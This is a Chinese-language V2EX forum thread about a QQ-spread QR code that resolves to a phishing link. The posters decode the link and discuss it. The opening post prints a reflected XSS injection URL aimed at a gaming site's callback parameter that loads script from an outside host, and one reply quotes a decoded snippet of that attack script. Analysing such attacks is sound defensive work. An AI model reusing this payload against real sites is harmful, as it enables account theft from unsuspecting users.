有没有腾讯的人啊。。好像出了个新漏洞???

2018-08-08 21:46:10 +08:00
 yejinmo

朋友自动发给我的,说是前不久他朋友发给他的,通过 QQ 传播的,需要在手机 QQ 上扫码

二维码解析后的恶意链接

http://comment.ali213.net/ali-comment-renotice.php?callback=%00%00%00%00%00%00%00%3CscripT/src=//633832.pywbm.cn/template/app.js%3E%3C/scripT%3E%3C!--

其中指向的恶意代码

http://633832.pywbm.cn/template/app.js

鹅厂员工调查下为啥会自动发给好友?

有没有搞安全的大佬研究下?

8763 次点击
所在节点    全球工单系统
41 条回复
crazygod
2018-08-09 09:58:34 +08:00
钓鱼网站,最简单的破解方法就是看网址。。。官方一般不会有杂七杂八的前缀和后缀
faceRollingKB
2018-08-09 10:05:07 +08:00
人可以做得更多,看域名看证书
浏览器也可以做得更多,做一些常见的问题检测
yejinmo
2018-08-09 10:19:47 +08:00
@crazygod #21

手机 QQ 扫了码之后没地方看网址。。只能是解了二维码之后在电脑上看
licoycn
2018-08-09 10:22:30 +08:00
很明显钓鱼网站
kfteast
2018-08-09 11:45:53 +08:00
@34C 貌似有个叫第九工场的网站 一部分是免费制作 绝大部分是收费的
tutustream
2018-08-09 11:57:39 +08:00
@34C #10
@kfteast #25

联图网-二维码美化-吃豆人主题

其实我想说的是,这些美化过的手机扫可能会失败的。
C860
2018-08-09 14:16:30 +08:00
是游侠网的同学修复了?我现在看到的结果是:

fuck_your_mama({"status":"0","msg":"0"})
yejinmo
2018-08-09 14:19:46 +08:00
@C860 #27

游侠网这么有意思嘛
tetsai
2018-08-09 14:22:14 +08:00
@C860 #27 +1,英文加拼音,讲究
houzhishi
2018-08-09 14:37:03 +08:00
@tetsai 的确挺讲究的。
8qwe24657913
2018-08-09 15:03:21 +08:00
@AlisaDestiny #13 那个 pastebin 上代码第 47 行还是混淆过的,解码出来是
var system={win:false,mac:false,xll:false};var p=navigator.platform;system.win=p.indexOf("Win")==0;system.mac=p.indexOf("Mac")==0;system.x11=(p=="X11")||(p.indexOf("Linux")==0);if(system.win||system.mac||system.xll){window.location.href="http://pvp.qq.com/m/"}
如果系统是 win / mac / linux,跳到王者荣耀官网,摆明了是准备只坑手机……

再就是点击登录后跳转的图片
![]( http://yunzhijia.com/microblog/filesvr/5b365ddd364a0f55c8d16590)
这表情嘲讽意义很浓啊
lneoi
2018-08-09 15:17:49 +08:00
23333 这个返回
TOTT
2018-08-09 15:34:07 +08:00
楼主头像大图有没有,或者高清的
bpllzbh
2018-08-09 16:20:14 +08:00
```
[markdown-test]( https://www.google.com.au/)
```
yejinmo
2018-08-09 16:30:57 +08:00
@bpllzbh #34

测试失败
yejinmo
2018-08-09 16:31:31 +08:00
x7395759
2018-08-09 18:44:08 +08:00
腾讯曾经 5 块钱一个网站漏洞哈哈哈
input2output
2018-08-09 19:10:51 +08:00
类似这种 XSS 见过好几次了
pyufftj
2018-08-10 09:30:43 +08:00
@x7395759 什么梗。
colouryin
2018-08-10 10:19:17 +08:00
我也有同学给我发……手机 QQ 点链接要手动输密码,用浏览器打开能用快捷登录调用 QQ 登录,然后会跳转到 QQ 空间……

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/478074

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX